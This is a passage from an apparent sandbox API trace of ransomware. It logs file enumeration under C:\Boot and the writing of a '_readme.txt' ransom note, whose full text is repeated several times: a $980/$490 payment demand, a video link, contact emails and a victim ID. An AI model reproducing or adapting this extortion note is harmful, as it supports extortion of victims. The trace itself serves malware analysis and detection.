| out: hHeap=0x2c0000) returned 1 [0173.681] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.681] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.681] PathFindFileNameW (pszPath="") returned="" [0173.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.682] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.682] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.682] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.682] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8d2f0 [0173.683] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0173.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.683] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0173.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.683] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.683] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.683] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.685] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.685] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.686] CloseHandle (hObject=0x690) returned 1 [0173.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.687] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4ff360, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.687] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4ff360, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4ff360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4ff360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.687] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.688] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.689] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0173.689] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.689] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.690] PathFindFileNameW (pszPath="") returned="" [0173.690] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.690] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.690] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.690] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.690] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0173.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.690] HeapFree (in: 